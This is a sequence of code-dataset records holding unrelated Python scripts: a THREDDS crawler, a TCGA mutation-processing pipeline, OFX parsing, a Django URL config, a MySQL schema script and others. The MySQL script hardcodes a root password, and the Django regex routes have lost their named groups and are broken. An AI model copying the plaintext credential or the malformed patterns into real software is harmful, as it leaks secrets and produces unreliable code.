\"--skips\",\n \"-s\",\n type=str,\n multiple=True,\n help=\"Pattern to ignore when THREDDS crawling\",\n)\n@click.option(\n \"--select\",\n \"-t\",\n type=str,\n required=True,\n help=\"Target file pattern to match for yaml\",\n)\n@click.option(\n \"--workers\",\n \"-w\",\n type=int,\n default=4,\n help=\"Number of thredds crawler workers to use\",\n)\n@click.option(\n \"--outfile\", type=str, default=\"metadata.tar.gz\", help=\"Sets the output file name\"\n)\ndef cli(thredds_catalogue, skips, select, workers, outfile):\n \"\"\"Download Metadata from THREDDS server to tarball\n\n Example:\n\n \\b\n Download files in directory that match `*yaml` and store them as a tar\n > thredds-to-tar -c \"http://dapds00.nci.org.au/thredds/catalog/if87/2018-11-29/\"\n -t \".*ARD-METADATA.yaml\" -s '.*NBAR.*' -s '.*SUPPLEMENTARY.*'\n -s '.*NBART.*' -s '.*/QA/.*' -w 8 --outfile 2018-11-29.tar.gz\n\n \"\"\"\n print(\n \"Searching {thredds_catalogue} for matching files\".format(\n thredds_catalogue=thredds_catalogue\n )\n )\n urls = thredds_find_glob(thredds_catalogue, skips, [select], workers)\n\n print(\"Found {0} metadata urls\".format(str(len(urls))))\n\n yamls = download_yamls(urls, workers)\n\n # jam it all in a tar\n tar_opts = dict(\n name=outfile, mode=\"w\" + tar_mode(gzip=True, xz=True, is_pipe=False)\n )\n with tarfile.open(**tar_opts) as tar:\n for yaml in yamls:\n add_txt_file(tar=tar, content=yaml[0], fname=yaml[1])\n\n print(\"Done!\")\n\n\nif __name__ == \"__main__\":\n cli()\n","sub_path":"apps/cloud/odc/apps/cloud/thredds_to_tar.py","file_name":"thredds_to_tar.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"201562093","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport pyranges as pr\nimport pathlib\npath = pathlib.Path.cwd()\nif path.stem == 'ATGC2':\n cwd = path\nelse:\n cwd = list(path.parents)[::-1][path.parts.index('ATGC2')]\n##your path to the files directory\nfile_path = cwd / 'files/'\n\n# load tcga clinical file download from 'https://api.gdc.cancer.gov/data/1b5f413e-a8d1-4d10-92eb-7c4ae739ed81'\ntcga_sample_table = pd.read_csv(file_path / 'TCGA-CDR-SupplementalTableS1.tsv', sep='\\t').iloc[:, 1:]\ntcga_sample_table['histological_type'].fillna('', inplace=True)\n\n# load pathology annotations from asb\ntumor_types = pd.read_csv(file_path / 'tumor_types_NCI-T.csv', sep='\\t')\ntumor_types.fillna('', inplace=True)\ntcga_sample_table = pd.merge(tcga_sample_table, tumor_types[['type', 'histological_type', 'NCI-T Label', 'NCI-T Code']], how='left', on=['type', 'histological_type'])\n\n# tcga mc3 filename download from 'https://gdc.cancer.gov/about-data/publications/mc3-2017'\nmc3_file_name = 'mc3.v0.2.8.CONTROLLED.maf'\n# these are a core set of basic columns we would want\nusecols = ['Hugo_Symbol', 'Hugo_Symbol', 'Center', 'NCBI_Build', 'Chromosome', 'Start_Position', 'End_Position', 'STRAND', 'Variant_Classification', 'Variant_Type', 'Consequence', 'Reference_Allele', 'Tumor_Seq_Allele2', 't_ref_count', 't_alt_count', 'Tumor_Sample_Barcode', 'CONTEXT', 'FILTER', 'CDS_position']\ntcga_maf = pd.read_csv(file_path / mc3_file_name, sep='\\t', usecols=usecols, low_memory=False)\n##The MAF contains nonpreferred pairs which results in some samples having duplicated variants\nfilters = ['PASS', 'NonExonic,bitgt', 'NonExonic,bitgt,wga', 'NonExonic', 'NonExonic,wga', 'bitgt', 'bitgt,wga', 'wga', \\\n 'broad_PoN_v2', 'NonExonic,bitgt,broad_PoN_v2', 
'NonExonic,bitgt,broad_PoN_v2,wga', 'NonExonic,broad_PoN_v2', \\\n 'broad_PoN_v2,wga', 'bitgt,broad_PoN_v2', 'NonExonic,broad_PoN_v2,wga', 'bitgt,broad_PoN_v2,wga']\n\ntcga_maf = tcga_maf.loc[tcga_maf['FILTER'].isin(filters)]\ntcga_maf = tcga_maf.loc[tcga_maf['Chromosome'] != 'MT']\n\n# df of counts via groupby, could add other metrics derived from mc maf here\nnon_syn = ['Missense_Mutation', 'Nonsense_Mutation', 'Frame_Shift_Del', 'Frame_Shift_Ins', 'In_Frame_Del', 'In_Frame_Ins', 'Nonstop_Mutation']\ntcga_counts = tcga_maf[['Variant_Classification', 'Tumor_Sample_Barcode']].groupby('Tumor_Sample_Barcode').apply(lambda x: pd.Series([len(x), (x['Variant_Classification'].isin(non_syn)).sum()], index=['all_counts', 'non_syn_counts']))\ntcga_counts['non_syn_tmb'] = tcga_counts['non_syn_counts'] / 31.85\ntcga_counts.reset_index(inplace=True)\n# linkage to pancan clinical annotation table via sample barcode\ntcga_counts['bcr_patient_barcode'] = tcga_counts['Tumor_Sample_Barcode'].str.extract(r'^([^-]+-[^-]+-[^-]+)-')\ntcga_counts['bcr_sample_barcode'] = tcga_counts['Tumor_Sample_Barcode'].str.extract(r'^([^-]+-[^-]+-[^-]+-[^-]+)-')\n\n# join to clinical annotation for data in mc3 only, this will add Tumor_Sample_Barcode also to the tcga_sample_table\ntcga_sample_table = pd.merge(tcga_sample_table, tcga_counts, how='right', on='bcr_patient_barcode')\n\n# add MANTIS data downloaded from 'https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5972025/bin/NIHMS962713-supplement-File_S2.xlsx'\nmantis_file_name = 'NIHMS962713-supplement-File_S2.csv'\nmantis_df = pd.read_csv(file_path / mantis_file_name, sep='\\t')\nmantis_df['Tumor_Sample_Barcode'] = mantis_df['Tumor Filename'].str.extract(r'(TCGA[^\\.]+)\\.')\ntcga_sample_table = pd.merge(tcga_sample_table, mantis_df[['Tumor_Sample_Barcode', 'MANTIS Score']], how='left', on='Tumor_Sample_Barcode')\n\n#add msi pcr labels, data processing and data sources available at ATGC/files/msi_ground_truth/\nmsi = pickle.load(open(file_path / 'msi_ground_truth' / 'msi_labels.pkl', 'rb'))\ntcga_sample_table = pd.merge(tcga_sample_table, msi, how='left', left_on='bcr_patient_barcode', right_index=True)\ntcga_sample_table.rename(columns={0: 'msi'}, inplace=True)\n\n\n##not every kit covered the entire exome, kit information is only available in the readgroups from the API\nimport requests\nimport json\ncases = list(tcga_sample_table['bcr_patient_barcode'])\n#\ncases_endpt = 'https://api.gdc.cancer.gov/cases'\nresponses = []\nstep = 100\ncount = 0\nX = True\nwhile X:\n print(count)\n if (count+1)*step >= len(cases):\n value = cases[count*step:]\n X = False\n value = cases[count*step: (count+1)*step]\n count += 1\n filt = {\"op\": \"in\",\n \"content\": {\n \"field\": \"cases.submitter_id\",\n \"value\": value\n }\n }\n params = {'filters': json.dumps(filt), \"expand\": \"files.analysis.metadata.read_groups\", 'size': '100'}\n response = requests.get(cases_endpt, params=params).json()\n responses.append(response)\n\n##If you don't want to use the API again save the data\nwith open(file_path / 'responses_controlled.pkl', 'wb') as f:\n pickle.dump([cases, responses], f)\n\n# with open(file_path / 'responses_controlled.pkl', 'rb') as f:\n# cases, responses = pickle.load(f)\n\n\nflattened_responses = []\nfor response in responses:\n for i in response[\"data\"][\"hits\"]:\n flattened_responses.append(i)\n\n##map a sample to its barcode\ncase_to_barcode = {i: j for i, j in zip(tcga_sample_table['bcr_patient_barcode'], tcga_sample_table['Tumor_Sample_Barcode'])}\n\n##will need this 
later\ncancer_dict = {i: j for i, j in zip(tcga_sample_table['bcr_patient_barcode'], tcga_sample_table['type'])}\n\n##the responses are not in order requested from the API\nhits = {}\nfor case in case_to_barcode:\n for j in flattened_responses:\n for k in j['submitter_sample_ids']:\n if case in k:\n hits[case] = j\n break\n\n\ndata = {}\nfor case in case_to_barcode:\n for i in hits[case]['files']:\n for k in i['analysis']['metadata']['read_groups']:\n if k['library_strategy'] == 'WXS':\n Y = False\n sample = k['experiment_name']\n if sample[-2:] == '-1':\n sample = sample[:-2]\n if sample == case_to_barcode[case]:\n key = case_to_barcode[case]\n Y = True\n else:\n sample = sample[5:]\n temp_sample = case_to_barcode[case][5:]\n if sample == temp_sample:\n key = case_to_barcode[case]\n Y = True\n else:\n if cancer_dict[case] == 'LAML' and 'TCGA' not in k['experiment_name']:\n if case in ['TCGA-AB-2918', 'TCGA-AB-2934', 'TCGA-AB-2864', 'TCGA-AB-2909', 'TCGA-AB-2807', 'TCGA-AB-2808', 'TCGA-AB-2935']:\n pass\n elif case == 'TCGA-AB-2869':\n if k['experiment_name'] == \"H_KA-141273-0927521\":\n key = case_to_barcode[case]\n Y = True\n else:\n key = case_to_barcode[case]\n Y = True\n else:\n if cancer_dict[case] == 'LUSC':\n sample = k['experiment_name'][10:].replace('TP', '01A')\n temp_sample = case_to_barcode[case][8:]\n if sample == temp_sample:\n key = case_to_barcode[case]\n Y = True\n else:\n ##handle the mislabeled SKCM cases here\n if case in ['TCGA-HR-A2OH', 'TCGA-HR-A2OG', 'TCGA-D9-A4Z6', 'TCGA-D9-A1X3']:\n sample = k['experiment_name'].replace('01A', '06A')\n if sample == case_to_barcode[case]:\n key = case_to_barcode[case]\n Y = True\n else:\n # these BRCA cases have some sort of mislabel, not sure what to do:['TCGA-BH-A1EU', 'TCGA-A2-A04T', 'TCGA-E2-A15I']\n pass\n if Y== False:\n temp_sample = case_to_barcode[case][5:20]\n if sample == temp_sample:\n key = case_to_barcode[case]\n Y = True\n if Y == True:\n key = key[:15]\n data[key] = data.get(key, {'centers': [], 'kits': [], 'beds': []})\n data[key].update([('centers', data[key]['centers'] + [k['sequencing_center']]),\\\n ('kits', data[key]['kits'] + [k['target_capture_kit_name']]),\\\n ('beds', data[key]['beds'] + [k['target_capture_kit_target_region']])])\n\n\n\nbad_kits=['Gapfiller_7m','NimbleGen Sequence Capture 2.1M Human Exome Array']\nbad_beds=['https://bitbucket.org/cghub/cghub-capture-kit-info/raw/c38c4b9cb500b724de46546fd52f8d532fd9eba9/BI/vendor/Agilent/tcga_6k_genes.targetIntervals.bed',\n'https://bitbucket.org/cghub/cghub-capture-kit-info/raw/c38c4b9cb500b724de46546fd52f8d532fd9eba9/BI/vendor/Agilent/cancer_2000gene_shift170.targetIntervals.bed']\n\nbad_samples = []\nnull_samples = []\n\nfor sample in tcga_sample_table['Tumor_Sample_Barcode']:\n sample = sample[:15]\n if sample not in data:\n null_samples.append(sample)\n else:\n X = False\n for kit, bed in zip(data[sample]['kits'], data[sample]['beds']):\n if not kit:\n null_samples.append(sample)\n else:\n for sub_kit, sub_bed in zip(kit.split('|'), bed.split('|')):\n if sub_kit not in bad_kits:\n if sub_bed not in bad_beds:\n X = True\n break\n if X == False:\n bad_samples.append(sample)\n\n##add columns to the sample table\ntcga_sample_table['Exome_Covered'] = ~tcga_sample_table['Tumor_Sample_Barcode'].str[:15].isin(bad_samples + null_samples)\ntcga_sample_table['Exome_Unknown'] = tcga_sample_table['Tumor_Sample_Barcode'].str[:15].isin(null_samples)\n\n##sample table is done, save to file\npickle.dump(tcga_sample_table, open(file_path / 
'tcga_sample_table_controlled.pkl', 'wb'))\n\n\nchromosomes = {}\nfor i in list(range(1, 23))+['X', 'Y']:\n with open(file_path / 'chromosomes' / ('chr' + str(i) + '.txt')) as f:\n chromosomes[str(i)] = f.read()\n\n\n##Use GFF3 to annotate variants\n##ftp://ftp.ensembl.org/pub/grch37/current/gff3/homo_sapiens/\ngff = pd.read_csv(file_path / 'Homo_sapiens.GRCh37.87.gff3',\n sep='\\t',\n names=['chr', 'unknown', 'gene_part', 'start', 'end', 'unknown2', 'strand', 'unknown3', 'gene_info'],\n usecols=['chr','gene_part', 'start', 'end', 'gene_info'],\n low_memory=False)\n\n\ngff_cds_pr = pr.PyRanges(gff.loc[(gff['gene_part'] == 'CDS') & gff['chr'].isin(chromosomes), ['chr', 'start', 'end', 'gene_info']].astype({'start': int, 'end': int}).rename(columns={'chr': 'Chromosome', 'start': 'Start', 'end': 'End'})).merge()\ngff_exon_pr = pr.PyRanges(gff.loc[(gff['gene_part'] == 'exon') & gff['chr'].isin(chromosomes), ['chr', 'start', 'end', 'gene_info']].astype({'start': int, 'end': int}).rename(columns={'chr': 'Chromosome', 'start': 'Start', 'end': 'End'})).merge()\ndel gff\n\n##make index column for merging\ntcga_maf['index'] = tcga_maf.index.values\n\nmaf_pr = pr.PyRanges(tcga_maf.loc[:, ['Chromosome', 'Start_Position', 'End_Position', 'index']].rename(columns={'Start_Position': 'Start', 'End_Position': 'End'}))\n\n##use the genie 7.0 panels: https://www.synapse.org/#!Synapse:syn21551261\ngenie = pd.read_csv(file_path / 'genomic_information.txt', sep='\\t', low_memory=False)\npanels = genie.SEQ_ASSAY_ID.unique()\npanel_df = pd.DataFrame(data=panels, columns=['Panel'])\n\n\n##http://hgdownload.cse.ucsc.edu/goldenPath/hg19/database/simpleRepeat.txt.gz\nrepeats = pd.read_csv(file_path / 'simpleRepeat.txt', sep='\\t', low_memory=False, header=None, usecols=[1, 2, 3])\nrepeats[1] = repeats[1].str.replace('chr', '')\nrepeats.rename(columns={1: 'Chromosome', 2: 'Start', 3: 'End'}, inplace=True)\nrepeats_pr = pr.PyRanges(repeats.loc[repeats['Chromosome'].isin(chromosomes)]).merge()\n\ntotal_sizes = []\ncds_sizes = []\nexon_sizes = []\npanel_prs = []\n\nfor panel in panels:\n print(panel)\n panel_pr = pr.PyRanges(genie.loc[(genie['SEQ_ASSAY_ID'] == panel) & genie['Chromosome'].isin(chromosomes), 'Chromosome':'End_Position'].rename(columns={'Start_Position': 'Start', 'End_Position': 'End'})).merge()\n total_sizes.append(sum([i + 1 for i in panel_pr.lengths()]))\n cds_sizes.append(sum([i + 1 for i in panel_pr.intersect(gff_cds_pr).lengths()]))\n exon_sizes.append(sum([i + 1 for i in panel_pr.intersect(gff_exon_pr).lengths()]))\n panel_prs.append(panel_pr)\n\n\ngrs = {k: v for k, v in zip(['repeat', 'CDS', 'exon'] + list(panels), [repeats_pr, gff_cds_pr, gff_exon_pr] + panel_prs)}\nresult = pr.count_overlaps(grs, pr.concat({'maf': maf_pr}.values()))\nresult = result.df\n\ntcga_maf = pd.merge(tcga_maf, result.iloc[:, 3:], how='left', on='index')\n\npanel_df['total'] = total_sizes\npanel_df['cds'] = cds_sizes\npanel_df['exon'] = exon_sizes\n\n##get assumed size of the most common kit: https://bitbucket.org/cghub/cghub-capture-kit-info/src/master/BI/vendor/Agilent/whole_exome_agilent_1.1_refseq_plus_3_boosters.targetIntervals.bed\nagilent_df = pd.read_csv(file_path / 'whole_exome_agilent_1.1_refseq_plus_3_boosters.targetIntervals.bed', sep='\\t', low_memory=False, header=None)\nkit_pr = pr.PyRanges(agilent_df.rename(columns={0: 'Chromosome', 1: 'Start', 2: 'End'})).merge()\nkit_total = sum([i + 1 for i in kit_pr.lengths()])\nkit_cds = sum([i + 1 for i in kit_pr.intersect(gff_cds_pr).merge().lengths()])\nkit_exon = 
sum([i + 1 for i in kit_pr.intersect(gff_exon_pr).merge().lengths()])\n\npanel_df = panel_df.append({'Panel': 'Agilent_kit', 'total': kit_total, 'cds': kit_cds, 'exon': kit_exon}, ignore_index=True)\n\n\ndef variant_features(maf, ref_length=20, alt_length=20, five_p_length=20, three_p_length=20):\n refs = []\n alts = []\n five_ps = []\n three_ps = []\n if ref_length % 2 != 0:\n ref_length += 1\n print('Your ref length was not even, incrementing by 1.')\n if alt_length % 2 != 0:\n alt_length += 1\n print('Your alt length was not even, incrementing by 1.')\n\n for index, row in enumerate(maf.itertuples()):\n Ref = row.Reference_Allele\n Alt = row.Tumor_Seq_Allele2\n Chr = str(row.Chromosome)\n Start = row.Start_Position\n End = row.End_Position\n if pd.isna(Alt):\n print(str(index)+' Alt is nan')\n Ref = np.nan\n Alt = np.nan\n context_5p = np.nan\n context_3p = np.nan\n else:\n if len(Ref) > ref_length:\n Ref = Ref[:int(ref_length / 2)] + Ref[-int(ref_length / 2):]\n else:\n while len(Ref) < ref_length:\n Ref += '-'\n if len(Alt) > alt_length:\n Alt = Alt[:int(alt_length / 2)] + Alt[-int(alt_length / 2):]\n else:\n while len(Alt) < alt_length:\n Alt += '-'\n if row.Reference_Allele == '-':\n ##the TCGA coordinates for a null ref are a little weird\n assert Start-five_p_length >= 0\n context_5p = chromosomes[Chr][Start-five_p_length:Start]\n context_3p = chromosomes[Chr][Start:Start+three_p_length]\n else:\n assert Start-(five_p_length+1) >= 0\n context_5p = chromosomes[Chr][Start-(five_p_length+1):Start-1]\n context_3p = chromosomes[Chr][End:End+three_p_length]\n refs.append(Ref)\n alts.append(Alt)\n five_ps.append(context_5p)\n three_ps.append(context_3p)\n return refs, alts, five_ps, three_ps\n\ntcga_maf['Ref'], tcga_maf['Alt'], tcga_maf['five_p'], tcga_maf['three_p'] = variant_features(tcga_maf)\n\ntcga_maf.drop(columns=['index'], inplace=True)\n\npickle.dump(tcga_maf, open(file_path / 'tcga_maf_table_controlled.pkl', 'wb'), protocol=4)\npickle.dump(panel_df, open(file_path / 'tcga_panel_table_controlled.pkl', 'wb')) ##should be same as tcga_panel_table\n\n","sub_path":"files/process_tcga_mc3_controlled.py","file_name":"process_tcga_mc3_controlled.py","file_ext":"py","file_size_in_byte":16464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"292725246","text":"#!/usr/bin/python3\n\nimport codecs\n\nfrom ofxparse import OfxParser\nwith codecs.open('file.ofx') as fileobj:\n ofx = OfxParser.parse(fileobj)\n\n# The OFX object\n\nofx.account # An Account object\n\n# AccountType\n# (Unknown, Bank, CreditCard, Investment)\n\n# Account\naccount = ofx.account\naccount.account_id # The account number\naccount.routing_number # The bank routing number\naccount.branch_id # Transit ID / branch number\naccount.type # An AccountType object\naccount.statement # A Statement object\naccount.institution # An Institution object\n\n# InvestmentAccount(Account)\n\n#account.brokerid # Investment broker ID\naccount.statement # An InvestmentStatement object\n\n# Institution\n\ninstitution = account.institution\n#institution.organization\n#institution.fid\n\n# Statement\n\nstatement = account.statement\nstatement.start_date # The start date of the transactions\nstatement.end_date # The end date of the transactions\nstatement.balance # The money in the account as of the statement date\nstatement.available_balance # The money available from the account as of the statement date\nstatement.transactions # A list of Transaction objects\n\n# 
InvestmentStatement\n\nstatement = account.statement\nstatement.positions # A list of Position objects\nstatement.transactions # A list of InvestmentTransaction objects\n\n# Transaction\n\nfor transaction in statement.transactions:\n transaction.payee\n transaction.type\n transaction.date\n transaction.amount\n transaction.id\n transaction.memo\n transaction.sic\n transaction.mcc\n transaction.checknum\n\n# InvestmentTransaction\n\nfor transaction in statement.transactions:\n transaction.type\n transaction.tradeDate\n transaction.settleDate\n transaction.memo\n transaction.security # A Security object\n transaction.income_type\n transaction.units\n transaction.unit_price\n transaction.comission\n transaction.fees\n transaction.total\n transaction.tferaction\n\n# Positions\n\nfor position in statement.positions:\n position.security # A Security object\n position.units\n position.unit_price\n position.market_value\n\n# Security\n\nsecurity = transaction.security\n# or\nsecurity = position.security\nsecurity.uniqueid\nsecurity.name\nsecurity.ticker\nsecurity.memo","sub_path":"venv/ofxparsetest.py","file_name":"ofxparsetest.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"540738387","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 11 11:13:17 2021\r\n\r\n@author: Vadym\r\n\"\"\"\r\n\r\nimport os\r\nimport pandas as pd\r\n\r\nos.chdir(\"data\")\r\n\r\nresources_file = \"资源信息.csv\"\r\nresources_df = pd.read_csv(resources_file)\r\nassets_file ='资产信息.csv'\r\nassets_df = pd.read_csv(assets_file)\r\nassets_df = assets_df.rename(columns={\"ASSETSNAME\":\"NAME\",\"ASSETID\":\"ID\"})\r\nresources_df = resources_df.rename(columns={\"RESOURCENAME\":\"NAME\",\"RESOURCEID\":\"ID\"})\r\nresources_columns = resources_df.columns.tolist()\r\nassets_columns = assets_df.columns.tolist()\r\nall_columns = resources_columns + assets_columns\r\ncommon_columns = []\r\nfor col in all_columns:\r\n if col in resources_columns and col in assets_columns and col not in common_columns:\r\n common_columns.append(col)\r\nfiltered_resources_df = resources_df.filter(common_columns, axis=1)\r\nfiltered_assets_df = assets_df.filter(common_columns, axis=1)\r\nres_df = filtered_assets_df.append(filtered_resources_df)\r\n#res_df.drop(res_df.columns[1], axis = 1, inplace = True)\r\n\r\nres_df.to_csv(\"assets_resources.csv\") \r\n\r\nprint(res_df)\r\n","sub_path":"assets_resources2.py","file_name":"assets_resources2.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"445335717","text":"from __future__ import print_function\nimport mysql.connector as mysqli\nfrom mysql.connector import errorcode\ndef create_database(cursor):\n try:\n cursor.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME))\n except mysqli.Error as err:\n print(\"Failed creating database: {}\".format(err))\n exit(1)\n try:\n cnx.database = DB_NAME \n except mysqli.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\n\nDB_NAME = 'hydroponytest'\n\nTABLES = {}\nTABLES['employees'] = (\n \"CREATE TABLE employees (\"\n \" emp_no int(11) NOT NULL AUTO_INCREMENT,\"\n \" birth_date date NOT NULL,\"\n \" first_name varchar(14) NOT NULL,\"\n \" last_name varchar(16) NOT NULL,\"\n \" gender enum('M','F') NOT NULL,\"\n \" hire_date date NOT NULL, \"\n \" 
PRIMARY KEY (emp_no) \"\n \" ) ENGINE innoDB\")\nTABLES['departments']= (\n \"CREATE TABLE departments (\"\n \" dept_no char(4) NOT NULL,\"\n \" dept_name varchar(40) NOT NULL,\"\n \" PRIMARY KEY (dept_no), UNIQUE KEY dept_name (dept_name)\"\n \" ) ENGINE innoDB\")\n\nTABLES['salaries'] = (\n \"CREATE TABLE salaries (\"\n \" emp_no int(11) NOT NULL,\"\n \" salary int(11) NOT NULL,\"\n \" from_date date NOT NULL,\"\n \" to_date date NOT NULL,\"\n \" PRIMARY KEY (emp_no,from_date), KEY emp_no (emp_no),\"\n \" CONSTRAINT salaries_ibfk_1 FOREIGN KEY (emp_no) \"\n \" REFERENCES employees (emp_no) ON DELETE CASCADE\"\n \") ENGINE=InnoDB\")\n\nTABLES['deptemp'] = (\n \"CREATE TABLE deptemp (\"\n \" emp_no int(11) NOT NULL,\"\n \" dept_no char(4) NOT NULL,\"\n \" from_date date NOT NULL,\"\n \" to_date date NOT NULL,\"\n \" PRIMARY KEY (emp_no,dept_no), KEY emp_no (emp_no),\"\n \" KEY dept_no (dept_no),\"\n \" CONSTRAINT dept_emp_ibfk_1 FOREIGN KEY (emp_no) \"\n \" REFERENCES employees (emp_no) ON DELETE CASCADE,\"\n \" CONSTRAINT dept_emp_ibfk_2 FOREIGN KEY (dept_no) \"\n \" REFERENCES departments (dept_no) ON DELETE CASCADE\"\n \") ENGINE=InnoDB\")\n\nTABLES['deptmanager'] = (\n \" CREATE TABLE deptmanager (\"\n \" dept_no char(4) NOT NULL,\"\n \" emp_no int(11) NOT NULL,\"\n \" from_date date NOT NULL,\"\n \" to_date date NOT NULL,\"\n \" PRIMARY KEY (emp_no,dept_no),\"\n \" KEY emp_no (emp_no),\"\n \" KEY dept_no (dept_no),\"\n \" CONSTRAINT dept_manager_ibfk_1 FOREIGN KEY (emp_no) \"\n \" REFERENCES employees (emp_no) ON DELETE CASCADE,\"\n \" CONSTRAINT dept_manager_ibfk_2 FOREIGN KEY (dept_no) \"\n \" REFERENCES departments (dept_no) ON DELETE CASCADE\"\n \") ENGINE=InnoDB\")\n\nTABLES['titles'] = (\n \"CREATE TABLE titles (\"\n \" emp_no int(11) NOT NULL,\"\n \" title varchar(50) NOT NULL,\"\n \" from_date date NOT NULL,\"\n \" to_date date DEFAULT NULL,\"\n \" PRIMARY KEY (emp_no,title,from_date), KEY emp_no (emp_no),\"\n \" CONSTRAINT titles_ibfk_1 FOREIGN KEY (emp_no)\"\n \" REFERENCES employees (emp_no) ON DELETE CASCADE\"\n \") ENGINE=InnoDB\")\n\nconfig = {\n 'user': 'root',\n 'password': 'ffuswgwy',\n 'host': '127.0.0.1',\n 'database':'hydroponytest'\n }\n\ncnx = mysqli.connect(**config)\n\ncursor = cnx.cursor()\n#create_database(cursor)\n#cnx.database = 'hydropony'\nfor name,dd1 in TABLES.items():\n try:\n print(\"Creating table {}: \".format(name),end=\"\")\n cursor.execute(dd1)\n except mysqli.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"already exists.\")\n else:\n print(err.msg)\n else:\n print('OK')\n\n\ncursor.close()\ncnx.close()\n\n\n\n\n\n","sub_path":"mysqltest.py","file_name":"mysqltest.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"156844695","text":"\"\"\"bbs URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path\nfrom blog import views\n# NOTE: the named-group identifiers in the re_path patterns below were lost during text\n# extraction; article_id, username, condition and params are reconstructed placeholder names.\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('index/', views.index),\n path('', views.index),\n path('login/', views.login),\n path('logout/', views.logout),\n path('digg/', views.digg),\n path('comment/', views.comment),\n path('backstage/', views.backstage),\n path('upload/', views.upload),\n path('delarticle/', views.delarticle),\n re_path('update_article/(?P<article_id>\\d+)', views.update_article),\n path('addarticles/', views.addarticles),\n re_path('(?P<username>\\w+)/articles/(?P<article_id>\\d+)', views.articles),\n re_path('(?P<username>\\w+)/(?P<condition>category|tag|date)/(?P<params>.*)', views.homesite),\n re_path('(?P<username>\\w+)', views.homesite),\n]\n","sub_path":"bbs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"641234490","text":"def solve(cost_cj, cost_jc, mural):\n\t#print('cost_cj: {} cost_jc: {}, mural: {}'.format(cost_cj, cost_jc, mural))\n\n\tmural = cleaner(mural)\n\t#print('mural: {}'.format(mural))\n\n\tcount_cj = mural.count(\"CJ\")\n\t#print('count_cj: {}'.format(count_cj))\n\n\tcount_jc = mural.count(\"JC\")\n\t#print('count_jc: {}'.format(count_jc))\n\n\tcost = count_cj * cost_cj + count_jc * cost_jc\n\t#print('cost: {}'.format(cost))\n\n\treturn cost\n\n\n\ndef cleaner(mural):\n\tmural = list(mural)\n\n\toutlist = []\n\n\tfor ch in mural:\n\t\tif ch not in ('?', '\\n'):\n\t\t\toutlist.append(ch)\n\n\t# return (outlist)\n\tout = ''.join(outlist)\n\treturn out\n\n\ndef main():\n\t\n\tT = int(input())\n\t\n\tfor t in range(1, T + 1):\n\t\t\n\t\tline = [x for x in input().split(\" \")]\n\t\tx = int(line[0])\n\t\ty = int(line[1])\n\t\tmural = line[2]\n\n\t\tsol = solve(x, y, mural)\n\t\tprint (\"Case #{}: {}\".format(t, sol))\n\t\n\nif __name__ == \"__main__\":\n\tmain()\n\n\t\n\n","sub_path":"2021/qualification_round/moons_and_umbrellas/moons_stdin.py","file_name":"moons_stdin.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"200886118","text":"\"\"\"\nCatalog manipulation and lookup utilities\n\nNOT IMPLEMENTED\n\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nimport os\nimport sys\nfrom astropy.io import fits\n\nif sys.version_info[0] == 3:\n xrange = range\n basestring = str # so the isinstance string checks in crossmatch also work on Python 3\n\n# download from https://github.com/cristobal-sifon/readfile\nimport readfile\n\n\ndef crossmatch(cat1, cat2, cols1=0, cols2=0, tolerance=0, relative=0):\n \"\"\"\n Cross-match two catalogs according to some user-specified criteria\n\n Parameters\n ----------\n cat1,cat2 : np.ndarray or dict\n Whatever values should be cross-matched in each catalog.\n They could be object names, coordinates, etc, and there may\n be more than one entry per catalog.\n cols1,cols2 : list of int or list of str\n The column number(s) in each catalog to use. Both must have\n the same number of entries. Ignored if cat1,cat2 are single\n columns. If cat1 or cat2 is/are dict, then the\n corresponding col1/col2 must be a list of strings with\n entry names in the catalog.\n tolerance : float\n relative or absolute tolerance when comparing to arrays of\n numbers. 
If set to zero, matching will be exact.\n relative : int (0,1,2)\n Whether the tolerance is an absolute value (0), or with\n respect to the values in cat1 or cat2.\n\n Returns\n ------\n match1,match2 : (array of) boolean arrays\n Mask arrays containing True for objects that pass the\n matching criteria and False for those that don't\n\n \"\"\"\n cats = [cat1, cat2]\n cols = [cols1, cols2]\n # need to check the depth of cat1,cat2 and always make 2d\n for i in xrange(2):\n if len(np.array(cats[i]).shape) == 1:\n cats[i] = [cats[i]]\n # check the format of col1,col2 depending on the format of cat1,cat2\n msg = ''\n for i in xrange(2):\n # make them all arrays for easier testing\n if isinstance(cols[i], int) or isinstance(cols[i], basestring):\n cols[i] = [cols]\n elif not hasattr(cols[i], '__iter__'):\n msg = 'cols{0} can only be an int or a string or'.format(i+1)\n msg = '{0} a list of either'.format(msg)\n if 